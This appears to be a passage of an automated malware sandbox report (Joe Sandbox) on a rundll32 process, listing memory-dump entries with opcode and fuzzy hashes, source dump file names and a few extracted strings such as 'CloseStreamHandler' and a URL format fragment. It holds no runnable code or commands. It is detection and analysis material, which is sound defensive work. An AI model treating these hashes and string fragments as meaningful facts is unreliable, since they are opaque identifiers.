                                                                                  • API String ID: 0-3123048620
                                                                                  • Opcode ID: f7384c9c6a6ba96d1ef3b7524774e63544ffe9c056710ac1fc5d054778696bcc
                                                                                  • Instruction ID: 304319c2cf5cdba4dfe7941d77e9c17eac733fef36adeba474302ffb8e6e224f
                                                                                  • Opcode Fuzzy Hash: f7384c9c6a6ba96d1ef3b7524774e63544ffe9c056710ac1fc5d054778696bcc
                                                                                  • Instruction Fuzzy Hash: 4A31A1316053B42FD7022A7859143BA7F6AEF82324F1484F7F945CB153D9A59C41D3B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: f8faed3f801dab02ba38bfb13d4d43d565f63dad5d6ecce285288728b7a10cff
                                                                                  • Instruction ID: 9d5acbd153ed8f2831a3f25606d1d7e3dc98abd06d49948411064b34ba9b7a5e
                                                                                  • Opcode Fuzzy Hash: f8faed3f801dab02ba38bfb13d4d43d565f63dad5d6ecce285288728b7a10cff
                                                                                  • Instruction Fuzzy Hash: E53144317052615FDB05DB389D507BE3BE7EF81204F0444AAE042C72E6EAB4AD0AC3A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q
                                                                                  • API String ID: 0-238743419
                                                                                  • Opcode ID: d9e17a09f406359f5f72ca2581d1bce7c4afe82b07c51c9eb25ae8b03ed9663e
                                                                                  • Instruction ID: 97844fb6b5a5101fb92fcd62012c94b8c5863f6284424081af2aa6ebcf8e2a4b
                                                                                  • Opcode Fuzzy Hash: d9e17a09f406359f5f72ca2581d1bce7c4afe82b07c51c9eb25ae8b03ed9663e
                                                                                  • Instruction Fuzzy Hash: AD41C478A00124EBDB149F65C9487AB77E6FF88304F14C42AD412AB395DBB1AC46DB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: 23ac6eb186e4be202b798f4cb2f4bfb291080d8a8860c62a806e662284588a87
                                                                                  • Instruction ID: 965345ea4656d32736fb9985aa0dce5ac89cbda3ccb3fcc1859ad006aafe1620
                                                                                  • Opcode Fuzzy Hash: 23ac6eb186e4be202b798f4cb2f4bfb291080d8a8860c62a806e662284588a87
                                                                                  • Instruction Fuzzy Hash: 1C3121367001355FEB18CA399A407BE77EBEFC4215F0445AAE50AC72D4EBB4EA02D751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: 5617749dddbe322bca082098c7a909d86a4367938a324e63879733915de4d0ca
                                                                                  • Instruction ID: 68892d54df3d82d9eb872f7ad19e260a9c773dd9bbd54e4477c4ee6cec439da2
                                                                                  • Opcode Fuzzy Hash: 5617749dddbe322bca082098c7a909d86a4367938a324e63879733915de4d0ca
                                                                                  • Instruction Fuzzy Hash: C821A730B11218DFDB18EBA5D5957AE77B7EF84700F108539E402A7380DEB45D06CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR_q
                                                                                  • API String ID: 0-2241839734
                                                                                  • Opcode ID: 4acaadf8f380ba73993e19478c1f0be2a76304f83396ab9fdc876e1c1b3353ae
                                                                                  • Instruction ID: 896249be3388d0124bd4b8a244a2e7b3c596c2169d64b691ce379218af562232
                                                                                  • Opcode Fuzzy Hash: 4acaadf8f380ba73993e19478c1f0be2a76304f83396ab9fdc876e1c1b3353ae
                                                                                  • Instruction Fuzzy Hash: 3B219330B10219DBDB08EBA5D5557AE77B7EF88704F108529E402A7380DFB46D05CBA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ry/v{0}/?r={1}
                                                                                  • API String ID: 0-1910734042
                                                                                  • Opcode ID: 58c4cb67acedc6598c74c3c89900ed16d1cf3781a8df9ab1c4a85212d59ab19a
                                                                                  • Instruction ID: fb12563061e66a86f5f4d795e3f60cd2ba1e80ee603ddfb91b755d7a5b568f09
                                                                                  • Opcode Fuzzy Hash: 58c4cb67acedc6598c74c3c89900ed16d1cf3781a8df9ab1c4a85212d59ab19a
                                                                                  • Instruction Fuzzy Hash: BB215136B003749BEB219A798950BBE7BEBEFC5210F084077DA06D7285DEB4ED018751
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: b8a3e487fef65054e53544b884dabcdd527e94ff9716141a84379cf4280b8a0a
                                                                                  • Instruction ID: 2c12b37ff12d146f894e7eadc29c66ce792493ff7ca8c6b7dc4f26d869939455
                                                                                  • Opcode Fuzzy Hash: b8a3e487fef65054e53544b884dabcdd527e94ff9716141a84379cf4280b8a0a
                                                                                  • Instruction Fuzzy Hash: DA216239A00228AFDB14EF64D950A9EBBB7FFDC314F148025D809AB350DE75AC459BA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CloseStreamHandler
                                                                                  • API String ID: 0-3123048620
                                                                                  • Opcode ID: 4a20c934bb5ba0f90d0f6a77aca5b3b67a34c6870714648c42c0949e7ed59ecf
                                                                                  • Instruction ID: 40c7200342d3269a33314c8d1538bd3605904e38d4191d89245a399edac1d4bf
                                                                                  • Opcode Fuzzy Hash: 4a20c934bb5ba0f90d0f6a77aca5b3b67a34c6870714648c42c0949e7ed59ecf
                                                                                  • Instruction Fuzzy Hash: 8A114C217056741BFB1425745A1037E2BCBEBC5614F0044F7EA06CB782DCD4FC0263A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CloseStreamHandler
                                                                                  • API String ID: 0-3123048620
                                                                                  • Opcode ID: f75ff7055c185623837563cf4abab43f89691d1d69390f2ec5a63710b5c2be5e
                                                                                  • Instruction ID: cfe40341f867924436184f254fad949d5a9c2ce7246113f65a6573e4f25c8834
                                                                                  • Opcode Fuzzy Hash: f75ff7055c185623837563cf4abab43f89691d1d69390f2ec5a63710b5c2be5e
                                                                                  • Instruction Fuzzy Hash: A811442530A6E84FE716677859217693F66AB83208F2989DAD509CB683CD44EC0683A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: 7a30d7704a7cad9b31d70caf6ae3b5ce772b137c88d08c9644884153c9030d12
                                                                                  • Instruction ID: af81357232378546bc5e96ffba7b5b6ebbcd45feaaff787f7eaec60a6bd92c60
                                                                                  • Opcode Fuzzy Hash: 7a30d7704a7cad9b31d70caf6ae3b5ce772b137c88d08c9644884153c9030d12
                                                                                  • Instruction Fuzzy Hash: 4E114238A00114AFD724EF65D550AA97BB7FFDC314F14402AD509A7384CFB5AC45DBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: 14b07d472f53546a9926e222b5318cf047102a368c4b279de875604647f8b0a8
                                                                                  • Instruction ID: ecc12eeeb87b2d1c6e4f733780c883c968e39775740cb991f47797cd61265ca0
                                                                                  • Opcode Fuzzy Hash: 14b07d472f53546a9926e222b5318cf047102a368c4b279de875604647f8b0a8
                                                                                  • Instruction Fuzzy Hash: 0F116038A00115AFDB14DF65D950A9A7BB3FFCC314F148025D409A7394DFB9AC459BA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: b3f3d114bc120ba22a93ed411b21466c282b3247074e00ef515d196e5d2f6f09
                                                                                  • Instruction ID: 68947518e44993b3b795dd59e45ed9f61cf12b7cedae9e551ec94a82f7f1d601
                                                                                  • Opcode Fuzzy Hash: b3f3d114bc120ba22a93ed411b21466c282b3247074e00ef515d196e5d2f6f09
                                                                                  • Instruction Fuzzy Hash: C6114F38A00114AFDB24EF64D550AA97BB7FFDC314F14402AD509A7384CFB9AC85DBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: f13aee7f052ef6a6edb4a2880ffcd16d7b3d397c24682259c2c5902b46754e08
                                                                                  • Instruction ID: ab4098db4826842f8c6fb725e8e9dbc0f09c91d35cd7fb39000dc18e11af3d6e
                                                                                  • Opcode Fuzzy Hash: f13aee7f052ef6a6edb4a2880ffcd16d7b3d397c24682259c2c5902b46754e08
                                                                                  • Instruction Fuzzy Hash: 8B113039600515AFDB24DFA8D454AA97BB6FFCC320F14402AE60AA7354CF799C85CBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: 24bc88a78530eac461d041d79b8dd2d45c50ef0f18ab3313c0fc0a416e64bbf6
                                                                                  • Instruction ID: 2d396717d10aa563470dda4357b8bb70e18490f6b02cb34c782871008d24b736
                                                                                  • Opcode Fuzzy Hash: 24bc88a78530eac461d041d79b8dd2d45c50ef0f18ab3313c0fc0a416e64bbf6
                                                                                  • Instruction Fuzzy Hash: 8301F43C6157451FC7195F78A9751163FFAEED220430908ABC24ACF2A2FD689C0683E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ntainsKey
                                                                                  • API String ID: 0-1251752500
                                                                                  • Opcode ID: da1d46be2077cf45bef01959869393182b41a3b5c727555bec2d1de9b541df03
                                                                                  • Instruction ID: 20f5fc64a8fb720a579d253647f8d7c06469a7bcd8c7a2b405f9c6867b239c30
                                                                                  • Opcode Fuzzy Hash: da1d46be2077cf45bef01959869393182b41a3b5c727555bec2d1de9b541df03
                                                                                  • Instruction Fuzzy Hash: DCF0F63CA006051FDB1C5E7495352163BEAFED1218305086AC20ECF291FD68AC0287E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 10e53fe69b539b05ae37e9d52f853af10773b9fff7c6e7b80b1bd2e08b109b29
                                                                                  • Instruction ID: f7abd90238bb3635fa19fea49b2aa54c02c4f23a8e9c3502530834daf9d00342
                                                                                  • Opcode Fuzzy Hash: 10e53fe69b539b05ae37e9d52f853af10773b9fff7c6e7b80b1bd2e08b109b29
                                                                                  • Instruction Fuzzy Hash: B6918B35A00615CFCB04DFA9C9546AEB7B6FF88314B108669E809AB354EF74FD85CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 97bad567d51de26549527dcfd252f5d57c06e15a163ba94173202b1396252124
                                                                                  • Instruction ID: 80660f68597b5f66a5d8bf48dca8f8714289ad37436341eaed73c1dd94f2c05e
                                                                                  • Opcode Fuzzy Hash: 97bad567d51de26549527dcfd252f5d57c06e15a163ba94173202b1396252124
                                                                                  • Instruction Fuzzy Hash: 1A51AE35A002108FDB15DF39C59862EBBE6EF8931470485A9E80ADF365DF74ED06CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f14eb00facb6c1dfbcd975e794ae812edc5f88f63a8ce01c96ccd719b8388056
                                                                                  • Instruction ID: bc3fbda76106bca7b9cc6d5527a4a4b45da28e2ac6b4647a0c0a2a14746d447f
                                                                                  • Opcode Fuzzy Hash: f14eb00facb6c1dfbcd975e794ae812edc5f88f63a8ce01c96ccd719b8388056
                                                                                  • Instruction Fuzzy Hash: B9517C34E113099FDB01DFB4D849B9DBBF2FF88300F10856AE504AB295EB74A949CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c14c0d984b85bd03acee9703a6aa0f23fdbccc1a397463b3de6b6e94637440a2
                                                                                  • Instruction ID: d76da92921a6a7aef1605b9fef74fb51dade7dc887a4ec9ec92b42d21cc1d016
                                                                                  • Opcode Fuzzy Hash: c14c0d984b85bd03acee9703a6aa0f23fdbccc1a397463b3de6b6e94637440a2
                                                                                  • Instruction Fuzzy Hash: 70517B34E1130A9FDB05DFB8D849B9DBBF2FF88300F109569E414AB295DB74A945CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9cf62ee6fd1946eaa5a213244dad7ec23d5fd242cefe11a4f7d374c0f8c0a05f
                                                                                  • Instruction ID: 7d7bf5bfc94f1c8504903ba4534bbd7175ed3822137b86617d99d36346fbad64
                                                                                  • Opcode Fuzzy Hash: 9cf62ee6fd1946eaa5a213244dad7ec23d5fd242cefe11a4f7d374c0f8c0a05f
                                                                                  • Instruction Fuzzy Hash: 0B413B35B002189FCB14DF69D98099EBBB6FF8C714B10816AE905EB360DB71ED42CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb4bfb3fb28daa64f8dcca08cf6fb18c11287398aada7c1ef430682be1119983
                                                                                  • Instruction ID: 521efc5c115ec77093c43c74e2318acf086450dad0c6c3d184beb024214ade48
                                                                                  • Opcode Fuzzy Hash: fb4bfb3fb28daa64f8dcca08cf6fb18c11287398aada7c1ef430682be1119983
                                                                                  • Instruction Fuzzy Hash: 1E31B574A01618DFCB04DFA9D58499DBBFAFF88310B158069E805E7365DB70AC41CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3199b15f7c8e523a57aabf3f0da3ed8c3d3ccb0bcce3c9159300e850385daf4
                                                                                  • Instruction ID: 8bb36397ded7f3e131ff944ec07f602e57c16c13ea390da572ea8ea7acb72d20
                                                                                  • Opcode Fuzzy Hash: e3199b15f7c8e523a57aabf3f0da3ed8c3d3ccb0bcce3c9159300e850385daf4
                                                                                  • Instruction Fuzzy Hash: 8011E436B002258BDF189BA5D9002EEB7B7FFC8314F1484B9C005A7254DB75AD46CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb77b7c7efad22e1fe1da5dd88e994d65e5e0ab2322bf0e2096846e2c1d10b84
                                                                                  • Instruction ID: d54e30d813975c19bf83bcb1dfe20154611313dcbdc6949e238659e8a8fb92fb
                                                                                  • Opcode Fuzzy Hash: fb77b7c7efad22e1fe1da5dd88e994d65e5e0ab2322bf0e2096846e2c1d10b84
                                                                                  • Instruction Fuzzy Hash: 4801896EB0A3701BD725567A1A6472B7F5BABC5260F094467EE08C7301EDE4EC0082F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 18ff523b8a83b9fcec239a558c3f3f11d0ff57fe104644741961386f055f1990
                                                                                  • Instruction ID: 5669948b41432c6f789dc67804797d57bca1acf51940f916c61e3e50e08cb202
                                                                                  • Opcode Fuzzy Hash: 18ff523b8a83b9fcec239a558c3f3f11d0ff57fe104644741961386f055f1990
                                                                                  • Instruction Fuzzy Hash: F4215B75E102189FDB44DF69D880A9EBBF6EF8D710F108169E819EB321DB71A801CF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99489e72bd123db90b67958269dbe3c442e0c7162579f1dee4f4cdba20b5e822
                                                                                  • Instruction ID: 1885bf7fe88e272e29fbb0a55694581cf392e27b838b1985c48295d5c5a5310b
                                                                                  • Opcode Fuzzy Hash: 99489e72bd123db90b67958269dbe3c442e0c7162579f1dee4f4cdba20b5e822
                                                                                  • Instruction Fuzzy Hash: F601C836F001288BDF148AA9D9102EEB7F7EB8C315F0440BAC405F7254DB79A945CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6514fcff5d03ee6a9cd5f84b9255f04cc919e535a34877c80c46f0a9446a1939
                                                                                  • Instruction ID: 0583e4dccda7a3cbdd4481d229d9a827176f520b2ba17fdc5b50ab21ed84bda4
                                                                                  • Opcode Fuzzy Hash: 6514fcff5d03ee6a9cd5f84b9255f04cc919e535a34877c80c46f0a9446a1939
                                                                                  • Instruction Fuzzy Hash: C42136B5D042098FDB14DFAAC9806DEFBF4FF48324F10842AC519A7200CB79A946CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d609505cf0af5820bb0894c151929951b9790695fcf986898f39c104964bdfc8
                                                                                  • Instruction ID: 6b22a096f3a71d96563cdf3c9752301d4cbdce156afcda929b922702e272f4bf
                                                                                  • Opcode Fuzzy Hash: d609505cf0af5820bb0894c151929951b9790695fcf986898f39c104964bdfc8
                                                                                  • Instruction Fuzzy Hash: 7B01447A3101109F8708DAADF494A6EB79FFBC8675314803AF509C7351DE72EC128BA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e6b24339617d164384e70e7274230b6e19f02692aa06043734d3acde316a82ff
                                                                                  • Instruction ID: 4ea1ebc7c8efe7566e6df0b05f78d476854cb91c8dda163aad6af10a93f40c65
                                                                                  • Opcode Fuzzy Hash: e6b24339617d164384e70e7274230b6e19f02692aa06043734d3acde316a82ff
                                                                                  • Instruction Fuzzy Hash: 9011F4B1D042098EDB24DFAAC985ADEFBF4FF48324F14841AD41967240CB756945CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d890cf141e80244d8d8c4f6ebb185e70c468c7df182c50c0fc7597ce88ad5ed5
                                                                                  • Instruction ID: bc4ea4d70c8415528bd6de5deef28229867e3213cc2b40eca5fe5126a798b530
                                                                                  • Opcode Fuzzy Hash: d890cf141e80244d8d8c4f6ebb185e70c468c7df182c50c0fc7597ce88ad5ed5
                                                                                  • Instruction Fuzzy Hash: 7B0147382843089FF3156764D854B3A7B92EB80314F184C9AE6498F6C2CD61FC40C352
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2182d463eb9816deeedabcd32d7ff8d1dc0795df7bf57ae25fe1416bb571497c
                                                                                  • Instruction ID: 4d24efd4de7c075422565438768c3a03bcfb939ffae03bdc2f7742b3e22e1b83
                                                                                  • Opcode Fuzzy Hash: 2182d463eb9816deeedabcd32d7ff8d1dc0795df7bf57ae25fe1416bb571497c
                                                                                  • Instruction Fuzzy Hash: 5301B53170011497EB18AA6AC5587AF7AE79BC8314F108479D005BB390CFB56D0687E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b7c768969d883bb692ccebdd81840bd392aacee082c714016a684a29db6728b
                                                                                  • Instruction ID: 9587a5ad6d26c9e931cf08700354df9a438e02c948c449a65a4bc3e08f1f2e6f
                                                                                  • Opcode Fuzzy Hash: 0b7c768969d883bb692ccebdd81840bd392aacee082c714016a684a29db6728b
                                                                                  • Instruction Fuzzy Hash: 5101D631B1012997E714A6B986943EF77E79BC8714F15042AD101F3380CEF96D4297E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000003.1365657627.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_3_4c20000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6203b1fa257ca4df08f0af3f83b00f6425445c55612c075b3c612697e70c8385
                                                                                  • Instruction ID: 3d050336ed413b9aa66490fa7691aec9485fba0134cf98bb638e48ec631485ae
                                                                                  • Opcode Fuzzy Hash: 6203b1fa257ca4df08f0af3f83b00f6425445c55612c075b3c612697e70c8385
                                                                                  • Instruction Fuzzy Hash: 65F0AC32F052305BFB1417B45D643BD6753DBC0308F08816AC1089B2D4DAE6B443B3A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.1366548681.000000000470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0470D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_470d000_rundll32.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
